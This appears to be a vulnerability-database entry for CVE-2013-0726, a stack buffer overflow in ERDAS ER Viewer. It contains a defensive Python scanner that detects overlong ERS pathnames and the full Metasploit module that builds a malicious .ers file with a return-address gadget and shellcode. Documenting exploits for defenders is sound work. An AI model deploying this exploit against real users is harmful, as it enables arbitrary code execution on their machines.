CVE-2013-0726

critical
Published 2013-05-05 · Modified 2026-04-29
CVSS v3
—
CVSS v4 NEW
—
not yet in upstream
VIR risk
10.0

Description

Stack-based buffer overflow in the ERM_convert_to_correct_webpath function in ermapper_u.dll in ERDAS ER Viewer before 13.00.0001 allows remote attackers to execute arbitrary code via a crafted pathname in an ERS file.
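
A triage check for the condition described above, an overlong quoted value in an ERS file. It is an added example, not code from the advisory, Exploit-DB or Metasploit. The 260-byte threshold is an assumption taken from the 'Offset' value in the module on this page; `scan_ers` and both sample inputs are constructed for illustration.

```python
import re

# Assumption: 260 is the 'Offset' in the module's target on this page, i.e. the
# number of bytes copied before the saved return address is reached. It also
# equals Windows MAX_PATH, so a legitimate pathname stays below it.
LIMIT = 260

# key = "value" ; the closing quote is optional so truncated values still match
ASSIGN = re.compile(rb'^\s*(\w+)\s*=\s*"([^"\r\n]*)')
# "<Block> Begin" / "<Block> End" lines, used only to report where a key lives
BLOCK = re.compile(rb'^\s*(\w+)\s+(Begin|End)\s*$')


def scan_ers(data: bytes, limit: int = LIMIT):
    """Return (line_no, dotted_key, length) for each quoted value >= limit bytes."""
    findings, stack = [], []
    for line_no, line in enumerate(data.splitlines(), 1):
        block = BLOCK.match(line)
        if block:
            name = block.group(1).decode("ascii", "replace")
            if block.group(2) == b"Begin":
                stack.append(name)
            elif stack and stack[-1] == name:
                stack.pop()
            continue
        assign = ASSIGN.match(line)
        if assign and len(assign.group(2)) >= limit:
            key = assign.group(1).decode("ascii", "replace")
            findings.append((line_no, ".".join(stack + [key]), len(assign.group(2))))
    return findings


# Constructed samples: a short, ordinary header and one with a 300-byte Name.
BENIGN = b'DatasetHeader Begin\r\n\tName\t= "C:\\data\\tile_01.ers"\r\nDatasetHeader End\r\n'
OVERLONG = b'DatasetHeader Begin\n  Name    = "' + b"A" * 300 + b'"\nDatasetHeader End\n'

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("overlong", OVERLONG)):
        hits = scan_ers(sample)
        print(label, "->", hits if hits else "no overlong values")
```

The file is read as bytes and judged on length alone, because the module's BadChars list excludes control and high bytes, so an overlong value can consist entirely of printable ASCII.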

Predictions

Exploit likelihood
20%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-25448 local windows verified ruby · 3 KB
Metasploit · 2013-05-14

ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)

ruby exploit Source: Exploit-DB
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
        (version 11.04). The vulnerability exists in the module ermapper_u.dll where the
        function ERM_convert_to_correct_webpath handles user provided data in a insecure
        way. It results in arbitrary code execution under the context of the user viewing
        a specially crafted .ers file. This module has been tested successfully with ERS
        Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Parvez Anwar', # Vulnerability Discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0726' ],
          [ 'OSVDB', '92694' ],
          [ 'BID', '59379' ],
          [ 'URL', 'http://secunia.com/advisories/51725/' ]
        ],
      'Payload'        =>
        {
          'Space'    => 7516,
          'BadChars' => "\x22\x5c" +
            (0x7f..0xff).to_a.pack("C*") +
            (0x00..0x08).to_a.pack("C*") +
            (0x0a..0x1f).to_a.pack("C*"),
          'DisableNops' => true,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ESP'
            }
        },
      'SaveRegisters'  => [ 'ESP' ],
      'DefaultOptions'  =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'ERS Viewer 2011 (v11.04)  / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 260,
              'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 23 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.ers']),
      ], self.class)

  end

  # Rewrote it because make_nops is ignoring SaveRegisters
  # and corrupting ESP.
  def make_nops(count)
    return "\x43" * count # 0x43 => inc ebx
  end

  def exploit

    buf = rand_text(target['Offset'])
    buf << [target.ret].pack("V")
    buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
    buf << payload.encoded

    ers = %Q|
DatasetHeader Begin
  Name    = "#{buf}"
DatasetHeader End
    |

    file_create(ers)
  end
end

Metasploit modules

ERS Viewer 2011 ERS File Handling Buffer Overflow

Application impact

Vendor   Product          Versions                  Fixed
hexagon  erdas_er_viewer  {"endIncluding":"11.04"}

References

CWEs

CWE-119
